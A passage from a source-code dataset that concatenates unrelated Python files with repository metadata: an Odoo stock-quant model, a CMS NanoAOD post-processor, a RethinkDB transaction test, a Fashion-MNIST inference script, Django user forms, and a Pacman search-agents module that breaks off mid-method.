        for r in self:
            adict=[
                ('product_id',{'pr':None,'func':lambda r: r.name + (' [PN:%s]'%r.pn if r.pn else '')}),
                # ('product_id',{'pr':None}),
                ('lot_id',{'pr':None,'func':lambda r: r.name,'skip_if_False':False}),
                ('quantity',{'pr':None,'func':lambda val:'%s'%val,'skip_if_False':False}),
            ]
            name = name_compute(r,adict,join_char = u' | ')
            res.append((r.id,name))
        return res

    @api.model
    def name_search(self, name, args=None, operator='ilike', limit=100):
        # Match product name, normalised part number or serial number.
        # 'kho_da_chon' context ("already chosen") excludes already-picked quants.
        args = args or []
        context = self._context or {}
        if context.get('kho_da_chon') !=None:
            choosed_list = context.get('kho_da_chon') [0][2]
            args +=[('id','not in',choosed_list)]
        if name:
            pn_replace_str = pn_replace(name)
        else:
            pn_replace_str = ''
        recs = self.search(['|','|',('product_id', operator, name),('product_id.pn_replace', operator, pn_replace_str),('lot_id.name', operator, name)] + args, limit=limit)
        return recs.name_get()

    @api.model
    def search(self, args, offset=0, limit=None, order=None, count=False):
        # Mirror name_search's 'kho_da_chon' exclusion for plain search() calls.
        context = self._context or {}
        if context.get('kho_da_chon') !=None:
            choosed_list = context.get('kho_da_chon') [0][2]
            args +=[('id','not in',choosed_list)]
        return super(Quant, self).search(args, offset, limit, order, count=count)

    @api.constrains('quantity')
    def check_quantity(self):
        # A serial-tracked product may never hold more than one unit per quant.
        for quant in self:
            if float_compare(quant.quantity, 1, precision_rounding=quant.product_uom_id.rounding) > 0 and quant.lot_id and quant.product_id.tracking == 'serial':
                raise ValidationError(_('A serial number should only be linked to a single product. %s,%s,%s'%(quant.quantity,quant.product_id.name,quant.lot_id.name)))

    @api.model
    def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):
        # Inject an extra "filter by my department's stock" option into the
        # search view, right after the standard location group filter.
        res = super(Quant, self).fields_view_get(
            view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
        if view_type =='search':
            # write_to_current_path(u'%s'%res['arch'])
            # print ("res['arch']",res['arch'])
            doc = etree.fromstring(res['arch'])
            node = doc.xpath("//filter[@name='locationgroup']")[0]
            node.addnext(etree.Element('separator', {}))
            node.addnext(etree.Element('filter', {'string':'Lọc theo kho của trạm %s'%self.env.user.department_id.name,'name': 'loc_theo_tram_137', 'domain': "[('location_id.department_id','=',%s)]"%self.env.user.department_id.id}))
            res['arch'] = etree.tostring(doc, encoding='unicode')
        return res
|
[
"nguyenductu@gmail.com"
] |
nguyenductu@gmail.com
|
a87bf5f31c6025305ca0fd7c72b461abad7671a5
|
b2075a92c3854c921a95673a3c5ebb424ab08112
|
/python/postprocessing/framework/postprocessor.py
|
9eb1775d8dbd0f52159a9b31d8202b7f33272466
|
[] |
no_license
|
vhbb/nanoAOD-tools
|
cd2a6305991369948bb9577c5da3c7e4db275c52
|
14bce3dca68288e65b2daefce755d65914a3765d
|
refs/heads/master
| 2021-09-04T21:44:29.892241
| 2018-01-22T12:50:50
| 2018-01-22T12:50:50
| 106,291,673
| 1
| 1
| null | 2018-01-22T12:50:51
| 2017-10-09T14:06:47
|
Python
|
UTF-8
|
Python
| false
| false
| 4,843
|
py
|
#!/usr/bin/env python
import os
import time
import ROOT
ROOT.PyConfig.IgnoreCommandLineOptions = True
from PhysicsTools.NanoAODTools.postprocessing.framework.branchselection import BranchSelection
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import InputTree
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import eventLoop
from PhysicsTools.NanoAODTools.postprocessing.framework.output import FriendOutput, FullOutput
from PhysicsTools.NanoAODTools.postprocessing.framework.preskimming import preSkim
from PhysicsTools.NanoAODTools.postprocessing.framework.jobreport import JobReport
class PostProcessor :
    """NanoAOD post-processing driver (Python 2 codebase).

    Reads each input file's Events tree, applies an optional pre-skim
    (JSON lumi mask + cut), runs the analysis modules over the surviving
    events, and writes skimmed (or friend) output trees; optionally hadds
    the outputs and emits a framework job report.
    """
    def __init__(self,outputDir,inputFiles,cut=None,branchsel=None,modules=[],compression="LZMA:9",friend=False,postfix=None,
                      jsonInput=None,noOut=False,justcount=False,provenance=False,haddFileName=False,fwkJobReport=False):
        # NOTE(review): modules=[] is a mutable default argument; harmless here
        # because the list is only iterated, never mutated.
        self.outputDir=outputDir
        self.inputFiles=inputFiles
        self.cut=cut
        self.modules=modules
        self.compression=compression
        self.postfix=postfix
        self.json=jsonInput
        self.noOut=noOut
        self.friend=friend
        self.justcount=justcount
        self.provenance=provenance
        self.jobReport = JobReport() if fwkJobReport else None
        self.haddFileName=haddFileName
        # A framework job report implies a final hadd; pick a default name.
        if self.jobReport and not self.haddFileName :
            print "Because you requested a FJR we assume you want the final hadd. No name specified for the output file, will use tree.root"
            self.haddFileName="tree.root"
        self.branchsel = BranchSelection(branchsel) if branchsel else None
    def run(self) :
        """Process every input file, then optionally hadd and report."""
        if not self.noOut:
            # Output file suffix: explicit postfix, else _Friend/_Skim.
            outpostfix = self.postfix if self.postfix != None else ("_Friend" if self.friend else "_Skim")
            if self.compression != "none":
                ROOT.gInterpreter.ProcessLine("#include <Compression.h>")
                (algo, level) = self.compression.split(":")
                compressionLevel = int(level)
                if algo == "LZMA": compressionAlgo = ROOT.ROOT.kLZMA
                elif algo == "ZLIB": compressionAlgo = ROOT.ROOT.kZLIB
                else: raise RuntimeError("Unsupported compression %s" % algo)
            else:
                compressionLevel = 0
            print "Will write selected trees to "+self.outputDir
            if not self.justcount:
                if not os.path.exists(self.outputDir):
                    os.system("mkdir -p "+self.outputDir)
        if self.noOut:
            if len(self.modules) == 0:
                raise RuntimeError("Running with --noout and no modules does nothing!")
        # NOTE(review): with noOut=True the loop below still references
        # outpostfix when preparing output files -- looks like a latent
        # NameError path; confirm intended usage.
        for m in self.modules: m.beginJob()
        # With no modules there is no event loop: the tree is fast-cloned.
        fullClone = (len(self.modules) == 0)
        outFileNames=[]
        t0 = time.clock()
        totEntriesRead=0
        for fname in self.inputFiles:
            # open input file
            inFile = ROOT.TFile.Open(fname)
            #get input tree
            inTree = inFile.Get("Events")
            totEntriesRead+=inTree.GetEntries()
            # pre-skimming
            elist,jsonFilter = preSkim(inTree, self.json, self.cut)
            if self.justcount:
                print 'Would select %d entries from %s'%(elist.GetN() if elist else inTree.GetEntries(), fname)
                continue
            else:
                print 'Pre-select %d entries out of %s '%(elist.GetN() if elist else inTree.GetEntries(),inTree.GetEntries())
            if fullClone:
                # no need of a reader (no event loop), but set up the elist if available
                if elist: inTree.SetEntryList(elist)
            else:
                # initialize reader
                inTree = InputTree(inTree, elist)
            # prepare output file
            outFileName = os.path.join(self.outputDir, os.path.basename(fname).replace(".root",outpostfix+".root"))
            outFile = ROOT.TFile.Open(outFileName, "RECREATE", "", compressionLevel)
            outFileNames.append(outFileName)
            if compressionLevel: outFile.SetCompressionAlgorithm(compressionAlgo)
            # prepare output tree
            if self.friend:
                outTree = FriendOutput(inFile, inTree, outFile)
            else:
                outTree = FullOutput(inFile, inTree, outFile, branchSelection = self.branchsel, fullClone = fullClone, jsonFilter = jsonFilter,provenance=self.provenance)
            # process events, if needed
            if not fullClone:
                (nall, npass, timeLoop) = eventLoop(self.modules, inFile, outFile, inTree, outTree)
                print 'Processed %d preselected entries from %s (%s entries). Finally selected %d entries' % (nall, fname, inTree.GetEntries(), npass)
            else:
                print 'Selected %d entries from %s' % (outTree.tree().GetEntries(), fname)
            # now write the output
            outTree.write()
            outFile.Close()
            print "Done %s" % outFileName
            if self.jobReport:
                # NOTE(review): nall is only bound in the not-fullClone branch;
                # with fullClone + jobReport this raises NameError -- confirm.
                self.jobReport.addInputFile(fname,nall)
        for m in self.modules: m.endJob()
        print totEntriesRead/(time.clock()-t0), "Hz"
        if self.haddFileName :
            os.system("./haddnano.py %s %s" %(self.haddFileName," ".join(outFileNames))) #FIXME: remove "./" once haddnano.py is distributed with cms releases
        if self.jobReport :
            self.jobReport.addOutputFile(self.haddFileName)
            self.jobReport.save()
[
"andrea.rizzi@cern.ch"
] |
andrea.rizzi@cern.ch
|
f0c4e325811d89d928a9cf866949779e8aabab87
|
500ab8c56380741f8ec2e794e42deed6ee9c84df
|
/tests/test_concurrency.py
|
6ca2415aabb7f9516b38a70a1155ac504a23764f
|
[
"Apache-2.0"
] |
permissive
|
antonf/rethinktx
|
1686e11edf92a7d778681b5be526e55b9d11af1d
|
60bbe10ad46030cbcc7727b479ee5bd2355f1fcd
|
refs/heads/master
| 2020-12-05T16:18:36.610124
| 2017-03-19T23:25:43
| 2017-03-19T23:25:43
| 66,806,377
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,436
|
py
|
# Copyright 2016, Anton Frolov <frolov.anton@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import random
import threading
import uuid
import rethinkdb
import rethinktx
import six
from . import mocks
import unittest
LOG = logging.getLogger(__name__)

# Workload size: NUM_THREADS workers each attempt NUM_ITERATIONS random
# transfers among NUM_ACCOUNTS shared accounts.
NUM_ACCOUNTS = 10
NUM_ITERATIONS = 100
NUM_THREADS = 10
def perform_work(conn, account_ids):
    """Repeatedly move 10 units between two random accounts inside a
    transaction, silently ignoring the failures the test expects
    (optimistic-lock conflicts and availability errors)."""
    for _ in six.moves.range(NUM_ITERATIONS):
        src_id, dst_id = random.sample(account_ids, 2)
        try:
            with rethinktx.Transaction(conn) as tx:
                table = tx.table('accounts')
                src = table.get(src_id)
                dst = table.get(dst_id)
                src['balance'] -= 10
                dst['balance'] += 10
                table.put(src_id, src)
                table.put(dst_id, dst)
        except (rethinktx.OptimisticLockFailure,
                rethinkdb.ReqlAvailabilityError):
            pass
class WorkerThread(threading.Thread):
    """Thread that opens its own connection and runs the transfer workload."""

    def __init__(self, account_ids):
        super(WorkerThread, self).__init__()
        # accounts this worker shuffles money between
        self.account_ids = account_ids

    def run(self):
        # Each thread opens a private connection -- presumably because a
        # connection should not be shared across threads; confirm with the
        # rethinkdb driver docs.
        with mocks.get_connection() as conn:
            perform_work(conn, self.account_ids)
class ConcurrentTransactionsTestCase(unittest.TestCase):
    """Stress test: concurrent transfers must keep the total balance at 0.

    Requires a real RethinkDB connection; skipped when the test harness
    supplies a ConnectionMock.
    """
    def setUp(self):
        super(ConcurrentTransactionsTestCase, self).setUp()
        with mocks.get_connection() as conn:
            if isinstance(conn, mocks.ConnectionMock):
                self.skipTest('Mocked connection not supported')
            self._ensure_provisioned(conn)
            self.account_ids = self._create_accounts(conn, NUM_ACCOUNTS)
    @staticmethod
    def _ensure_provisioned(conn):
        """Create db/tables if missing and empty the tables for a clean run."""
        def ignore_exc(fn, *args, **kwargs):
            # Creation calls fail if the db/table already exists; that's fine.
            try:
                return fn(*args, **kwargs)
            except Exception:
                LOG.debug('Ignored exception', exc_info=True)
        ignore_exc(rethinkdb.db_create(conn.db).run, conn)
        ignore_exc(rethinkdb.table_create('accounts').run, conn)
        ignore_exc(rethinkdb.table_create('transactions').run, conn)
        rethinkdb.table('accounts').delete().run(conn)
        rethinkdb.table('transactions').delete().run(conn)
    @staticmethod
    def _create_accounts(conn, num_accounts):
        """Create `num_accounts` zero-balance accounts; return their UUID keys."""
        account_ids = []
        with rethinktx.Transaction(conn) as tx:
            accounts_tbl = tx.table('accounts')
            for i in six.moves.range(num_accounts):
                key = str(uuid.uuid4())
                account_ids.append(key)
                accounts_tbl.put(key, {'index': i, 'balance': 0})
        return account_ids
    def _total_balance(self):
        """Sum balances of all test accounts inside a single transaction."""
        with mocks.get_connection() as conn:
            total_balance = 0
            with rethinktx.Transaction(conn) as tx:
                accounts_tbl = tx.table('accounts')
                for account_id in self.account_ids:
                    total_balance += accounts_tbl.get(account_id)['balance']
            return total_balance
    @staticmethod
    def _show_stats():
        """Log how many transactions committed vs aborted during the run."""
        with mocks.get_connection() as conn:
            num_committed = rethinkdb.table('transactions')\
                .filter({'status': 'committed'}).count().run(conn)
            num_aborted = rethinkdb.table('transactions')\
                .filter({'status': 'aborted'}).count().run(conn)
            LOG.info('Committed transactions: %d; Aborted transaction: %d',
                     num_committed, num_aborted)
    def test_concurrent_transactions(self):
        """Run NUM_THREADS workers concurrently; total balance must stay 0."""
        workers = []
        for _ in six.moves.range(NUM_THREADS):
            worker = WorkerThread(self.account_ids)
            workers.append(worker)
            worker.start()
        for worker in workers:
            worker.join()
        self._show_stats()
        # Transfers are zero-sum, so any imbalance means isolation was broken.
        self.assertEqual(0, self._total_balance())
|
[
"frolov.anton@gmail.com"
] |
frolov.anton@gmail.com
|
2516a2bd1fa7c23e64c179adee06fce8c112efc9
|
59b55a64d9340ef6ee7544c47b4c0086bf797236
|
/scripts/run_full_image.py
|
360a7b0b18a6b2d73edb97934fac0b73b9300056
|
[] |
no_license
|
Jeronics/fashion-mnist-test-case
|
eda3c70d7b5e5113203d39ec5506acd79356148c
|
0b15855e7222e17345d20ca946b0d86c2d1ae29d
|
refs/heads/master
| 2022-10-06T06:34:11.643639
| 2020-06-03T08:23:58
| 2020-06-03T08:23:58
| 268,487,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
############################# IMPORTS #############################
import os.path as path
import pickle
import numpy as np
import torch
import torchvision.transforms as transforms
from models.networks import ProductionCNN2
from utils.application_utils import get_label_and_bounding_box, create_image
from utils.config import MEAN_PIXEL, STD_PIXEL, ARTIFACTS_DIR
###################################################################
if __name__ == "__main__":
    # Fixed seed so the synthetic test image is reproducible across runs.
    np.random.seed(1)
    image_name = "test_long_image"
    pil_image = create_image(image_name)
    # Same normalization presumably used at training time (see MEAN_PIXEL /
    # STD_PIXEL in utils.config) — TODO confirm against the training script.
    default_transformation = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((MEAN_PIXEL,), (STD_PIXEL,))
    ])
    pil_image = default_transformation(pil_image)
    # Add a leading batch dimension for the network.
    pil_image = pil_image.unsqueeze(0)
    model_name = 'cnn_3'
    # Load the pickled grid-search result and rebuild the production network
    # from the best model's saved weights; eval() disables dropout/batchnorm
    # training behavior.
    with open(path.join(ARTIFACTS_DIR, model_name + '.pkl'), 'rb') as f:
        cvGridSearch = pickle.load(f)
    model = ProductionCNN2(state_dict=cvGridSearch.best_model.module_.state_dict()).eval()
    print(type(pil_image))
    # Inference only — no gradient tracking needed.
    with torch.no_grad():
        class_idx, image_with_contour = get_label_and_bounding_box(model, pil_image)
|
[
"jeronicarandell@gmail.com"
] |
jeronicarandell@gmail.com
|
917682f58de05483c2d7dcd124010513ed4badc8
|
a1f53b731fd1e3eb1923fb39fcb01477aa45f5c0
|
/blogapp/form.py
|
fb40e9ed2e05b6ad0de2524ac88315822acdc8f1
|
[] |
no_license
|
arseni2/djangoblog
|
76922d4abd7550bfb8a9b0514eda727699e57e37
|
b3b8e1a30c4f2860719d62736571e6aa4d0258df
|
refs/heads/main
| 2023-03-23T07:27:43.091875
| 2021-03-20T22:41:16
| 2021-03-20T22:41:16
| 346,117,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 481
|
py
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from django.contrib.auth import get_user_model
CustomUser = get_user_model()
class CustomUserCreationForm(UserCreationForm):
    """Sign-up form for the project's custom user model.

    Extends the stock ``UserCreationForm`` field list with the custom
    ``age`` and ``email`` fields.
    """
    class Meta(UserCreationForm.Meta):
        model = CustomUser
        fields = UserCreationForm.Meta.fields+('age','email')
class CustomUserChangeForm(UserChangeForm):
    """Edit form for the custom user model.

    Reuses the default ``UserChangeForm`` field set unchanged; only the
    model is swapped for the project's user model.
    """
    class Meta:
        model = CustomUser
        fields = UserChangeForm.Meta.fields
|
[
"arc-37@mail.ru"
] |
arc-37@mail.ru
|
c7f7d55da80fa96f610e72e41a113d2b31b4f2a4
|
cb6ea8cffe592d5ecbae3581c15143836d9714fd
|
/1. Search/search/searchAgents.py
|
efaa50237bafa0577d76b28568a39f67d1a9410b
|
[] |
no_license
|
pswaroopk/pacman-ai
|
a51d421f6b4ebe1f2f55830a0ef2a1c1f6ae8607
|
64b971d82db73780c5e6c9561666ba86f8ff314a
|
refs/heads/master
| 2020-06-27T22:34:02.231705
| 2017-07-13T03:23:10
| 2017-07-13T03:23:10
| 97,074,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,146
|
py
|
# searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
    "An agent that goes West until it can't."

    def getAction(self, state):
        """Return WEST while it is a legal Pacman action, else STOP."""
        legal_moves = state.getLegalPacmanActions()
        return Directions.WEST if Directions.WEST in legal_moves else Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
    """
    This very general search agent finds a path using a supplied search
    algorithm for a supplied search problem, then returns actions to follow that
    path.
    As a default, this agent runs DFS on a PositionSearchProblem to find
    location (1,1)
    Options for fn include:
      depthFirstSearch or dfs
      breadthFirstSearch or bfs
    Note: You should NOT change any code in SearchAgent
    """
    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        # Warning: some advanced Python magic is employed below to find the right functions and problems
        # NOTE(review): this file is Python 2 only — `raise E, msg` statements
        # and `func.func_code` below are not valid Python 3 syntax/attributes.
        # Get the search function from the name and heuristic
        if fn not in dir(search):
            raise AttributeError, fn + ' is not a search function in search.py.'
        func = getattr(search, fn)
        # A search function that declares a 'heuristic' parameter gets one
        # bound in; otherwise it is used as-is.
        if 'heuristic' not in func.func_code.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            # Heuristics may live in this module or in search.py.
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError, heuristic + ' is not a function in searchAgents.py or search.py.'
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Note: this bit of Python trickery combines the search algorithm and the heuristic
            self.searchFunction = lambda x: func(x, heuristic=heur)
        # Get the search problem type from the name (must be a *Problem class
        # defined in this module).
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError, prob + ' is not a search problem type in SearchAgents.py.'
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)
    def registerInitialState(self, state):
        """
        This is the first time that the agent sees the layout of the game
        board. Here, we choose a path to the goal. In this phase, the agent
        should compute the path to the goal and store it in a local variable.
        All of the work is done in this method!
        state: a GameState object (pacman.py)
        """
        if self.searchFunction == None: raise Exception, "No search function provided for SearchAgent"
        starttime = time.time()
        problem = self.searchType(state) # Makes a new search problem
        self.actions  = self.searchFunction(problem) # Find a path
        totalCost = problem.getCostOfActions(self.actions)
        print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
        if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
    def getAction(self, state):
        """
        Returns the next action in the path chosen earlier (in
        registerInitialState).  Return Directions.STOP if there is no further
        action to take.
        state: a GameState object (pacman.py)
        """
        # Lazily initialize the cursor into the precomputed action list.
        if 'actionIndex' not in dir(self): self.actionIndex = 0
        i = self.actionIndex
        self.actionIndex += 1
        if i < len(self.actions):
            return self.actions[i]
        else:
            return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
    """
    A search problem defines the state space, start state, goal test, successor
    function and cost function.  This search problem can be used to find paths
    to a particular point on the pacman board.
    The state space consists of (x,y) positions in a pacman game.
    Note: this search problem is fully specified; you should NOT change it.
    """
    def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
        """
        Stores the start and goal.
        gameState: A GameState object (pacman.py)
        costFn: A function from a search state (tuple) to a non-negative number
        goal: A position in the gameState
        """
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        # An explicit start position overrides Pacman's current position.
        if start != None: self.startState = start
        self.goal = goal
        self.costFn = costFn
        self.visualize = visualize
        if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
            print 'Warning: this does not look like a regular search maze'
        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
    def getStartState(self):
        """Return the (x, y) start position."""
        return self.startState
    def isGoalState(self, state):
        """True iff `state` equals the goal position; also feeds the display."""
        isGoal = state == self.goal
        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state)
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
                    __main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
        return isGoal
    def getSuccessors(self, state):
        """
        Returns successor states, the actions they require, and a cost of 1.
         As noted in search.py:
             For a given state, this should return a list of triples,
         (successor, action, stepCost), where 'successor' is a
         successor to the current state, 'action' is the action
         required to get there, and 'stepCost' is the incremental
         cost of expanding to that successor
        """
        successors = []
        for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            x,y = state
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            # A move is legal iff the target square is not a wall.
            if not self.walls[nextx][nexty]:
                nextState = (nextx, nexty)
                cost = self.costFn(nextState)
                successors.append( ( nextState, action, cost) )
        # Bookkeeping for display purposes
        self._expanded += 1 # DO NOT CHANGE
        if state not in self._visited:
            self._visited[state] = True
            self._visitedlist.append(state)
        return successors
    def getCostOfActions(self, actions):
        """
        Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999.
        """
        if actions == None: return 999999
        x,y= self.getStartState()
        cost = 0
        for action in actions:
            # Check figure out the next state and see whether its' legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]: return 999999
            cost += self.costFn((x,y))
        return cost
class StayEastSearchAgent(SearchAgent):
    """
    Position-search agent whose step cost 1/2^x shrinks as x grows, so
    uniform-cost search prefers paths on the East side of the board.
    """
    def __init__(self):
        self.searchFunction = search.uniformCostSearch
        def costFn(pos):
            # Cost of stepping into (x, y) is 1/2^x.
            return .5 ** pos[0]
        self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
    """
    Position-search agent whose step cost 2^x grows with x, so uniform-cost
    search prefers paths on the West side of the board.
    """
    def __init__(self):
        self.searchFunction = search.uniformCostSearch
        def costFn(pos):
            # Cost of stepping into (x, y) is 2^x.
            return 2 ** pos[0]
        self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
    """Manhattan (L1) distance from `position` to `problem.goal`."""
    goal = problem.goal
    return abs(position[0] - goal[0]) + abs(position[1] - goal[1])
def euclideanHeuristic(position, problem, info={}):
    """Euclidean (straight-line) distance from `position` to `problem.goal`."""
    dx = position[0] - problem.goal[0]
    dy = position[1] - problem.goal[1]
    return (dx ** 2 + dy ** 2) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
#import pdb; pdb.set_trace()
class CornersProblem(search.SearchProblem):
    """
    This search problem finds paths through all four corners of a layout.

    Search state: ((x, y), [visited0, visited1, visited2, visited3]) — the
    current position plus one boolean per corner marking whether that corner
    has been reached.
    """
    def __init__(self, startingGameState,costFn = lambda x: 1, start=None, visualize=True):
        """
        Stores the walls, pacman's starting position and corners.
        """
        self.gameState = startingGameState
        self.walls = startingGameState.getWalls()
        self.startingPosition = startingGameState.getPacmanPosition()
        # The four reachable corners of the layout (inside the outer wall).
        top, right = self.walls.height-2, self.walls.width-2
        self.corners = ((1,1), (1,top), (right, 1), (right, top))
        for corner in self.corners:
            if not startingGameState.hasFood(*corner):
                print 'Warning: no food in corner ' + str(corner)
        self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
        # Please add any code here which you would like to use
        # in initializing the problem
        "*** YOUR CODE HERE ***"
        self.costFn = costFn
        self.visualize = visualize
        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
    def updateGoalState(self, state):
        # NOTE(review): appears to be dead/leftover code — self.goal is never
        # initialized in __init__ (AttributeError if called first), and
        # `distance` is never updated inside the loop so the comparison is
        # always against 999999.  No caller is visible in this file.
        distance = 999999
        goal = self.goal
        for corner in self.corners:
            currDist = util.manhattanDistance(state, corner)
            if distance > currDist:
                goal = corner
        self.goal = goal
    def getStartState(self):
        """
        Returns the start state (in your state space, not the full Pacman state
        space)
        """
        """startState = ( (x,y), [False, False, False, False])"""
        return (self.startingPosition, [False, False, False, False])
    def isGoalState(self, state):
        """
        Returns whether this search state is a goal state of the problem.
        """
        """goal = ( (x,y), [True, True, True, True])"""
        # Goal iff every corner's visited flag is set.
        isGoal = state[1][0] and state[1][1] and state[1][2] and state[1][3]
        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state[0])
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
                    __main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
        return isGoal
    def getSuccessors(self, state):
        """
        Returns successor states, the actions they require, and a cost of 1.
        As noted in search.py:
            For a given state, this should return a list of triples, (successor,
            action, stepCost), where 'successor' is a successor to the current
            state, 'action' is the action required to get there, and 'stepCost'
            is the incremental cost of expanding to that successor
        """
        """
        My state space is defined as s[(x,y), [False, True, True, False]] based on the state of the corner visited or not
        goal: s((x,y), [True, True, True, True])
        start: s((x,y), [False, False, False, False])
        """
        successors = []
        for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            "*** YOUR CODE HERE ***"
            """ Pack the status of the corners visited, if nextState is corner, mark that corner trues"""
            x,y = state[0]
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                nextState = (nextx, nexty)
                # Carry forward the visited flags, setting the flag for any
                # corner the successor lands on.
                corners = [False, False, False, False]
                for i, corner in enumerate(self.corners):
                    corners[i] = nextState == corner or state[1][i]
                cost = self.costFn(nextState)
                successors.append( ((nextState,corners), action, cost ))
        # Bookkeeping for display purposes
        self._expanded += 1 # DO NOT CHANGE
        if state[0] not in self._visited:
            self._visited[state[0]] = True
            self._visitedlist.append(state[0])
        return successors
    def getCostOfActions(self, actions):
        """
        Returns the cost of a particular sequence of actions.  If those actions
        include an illegal move, return 999999.  This is implemented for you.
        """
        if actions == None: return 999999
        x,y= self.startingPosition
        for action in actions:
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]: return 999999
        return len(actions)
def cornersHeuristic(state, problem):
    """
    Heuristic for the CornersProblem: a greedy chain of Manhattan distances.

    Repeatedly hops to the nearest still-unvisited corner (by Manhattan
    distance) and sums the hop lengths.  Returns 0 at a goal state.
    """
    corners = problem.corners # These are the corner coordinates
    if problem.isGoalState(state):
        return 0
    # Work on a copy of the visited flags so the search state is not mutated.
    visited = list(state[1])
    total = 0
    pos = state[0]
    while not all(visited):
        candidates = [
            (corner, idx, util.manhattanDistance(pos, corner))
            for idx, corner in enumerate(corners)
            if not visited[idx]
        ]
        # Hop to the closest remaining corner (first one on ties).
        pos, idx, dist = min(candidates, key=lambda entry: entry[2])
        visited[idx] = True
        total += dist
    return total
class AStarCornersAgent(SearchAgent):
    """SearchAgent running A* on CornersProblem with cornersHeuristic."""
    def __init__(self):
        def astar_with_corners(prob):
            return search.aStarSearch(prob, cornersHeuristic)
        self.searchFunction = astar_with_corners
        self.searchType = CornersProblem
class FoodSearchProblem:
    """
    A search problem associated with finding the a path that collects all of the
    food (dots) in a Pacman game.
    A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
      pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
      foodGrid:       a Grid (see game.py) of either True or False, specifying remaining food
    """
    def __init__(self, startingGameState):
        self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
        self.walls = startingGameState.getWalls()
        self.startingGameState = startingGameState
        self._expanded = 0 # DO NOT CHANGE
        self.heuristicInfo = {} # A dictionary for the heuristic to store information
        # NOTE(review): testVal is never read anywhere in this file.
        self.testVal = 0
    def getStartState(self):
        """Return (pacmanPosition, foodGrid) for the initial game state."""
        return self.start
    def isGoalState(self, state):
        """Goal iff no food remains in the state's food grid."""
        return state[1].count() == 0
    def getSuccessors(self, state):
        "Returns successor states, the actions they require, and a cost of 1."
        successors = []
